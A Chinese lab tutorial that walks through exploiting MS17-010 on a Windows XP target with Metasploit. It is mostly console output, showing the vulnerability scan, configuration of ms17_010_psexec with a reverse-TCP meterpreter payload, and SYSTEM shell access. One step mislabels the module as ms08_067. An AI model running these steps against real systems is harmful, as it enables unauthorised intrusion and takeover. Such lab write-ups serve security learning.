本文简单介绍了如何使用metasploit针对ms17_010进行渗透测试,仅供学习
测试环境 | 描述 | ip |
---|---|---|
主机 | kali2020 | 192.168.1.113 |
目标主机 | win xp sp3 | 192.168.1.108 |
①启动msf,搜索ms17_010,使用msf中的auxiliary模块进行扫描
msf6 > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.108 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.108:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.108:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >
②结果提示目标存在永恒之蓝漏洞,重新搜素,使用ms08_067攻击模块,设置参数
msf6 auxiliary(scanner/smb/smb_ms17_010) > search ms17_010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
2 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
3 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
4 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > use 2
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.108 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/ms17_010_psexec) > set rhosts 192.168.1.108
rhosts => 192.168.1.108
msf6 exploit(windows/smb/ms17_010_psexec) >
③进行攻击,获取meterpreter权限并进行提权
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.108:445 - Target OS: Windows 5.1
[*] 192.168.1.108:445 - Filling barrel with fish... done
[*] 192.168.1.108:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.108:445 - [*] Preparing dynamite...
[*] 192.168.1.108:445 - [*] Trying stick 1 (x86)...Boom!
[*] 192.168.1.108:445 - [+] Successfully Leaked Transaction!
[*] 192.168.1.108:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.108:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.108:445 - Reading from CONNECTION struct at: 0x88c03010
[*] 192.168.1.108:445 - Built a write-what-where primitive...
[+] 192.168.1.108:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.108:445 - Selecting native target
[*] 192.168.1.108:445 - Uploading payload... kRwOnYlP.exe
[*] 192.168.1.108:445 - Created \kRwOnYlP.exe...
[+] 192.168.1.108:445 - Service started successfully...
[*] 192.168.1.108:445 - Deleting \kRwOnYlP.exe...
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 3 opened (192.168.1.113:4444 -> 192.168.1.108:2363) at 2021-05-20 09:01:47 +0800
meterpreter > [*] Meterpreter session 4 opened (192.168.1.113:4444 -> 192.168.1.108:2323) at 2021-05-20 09:01:48 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >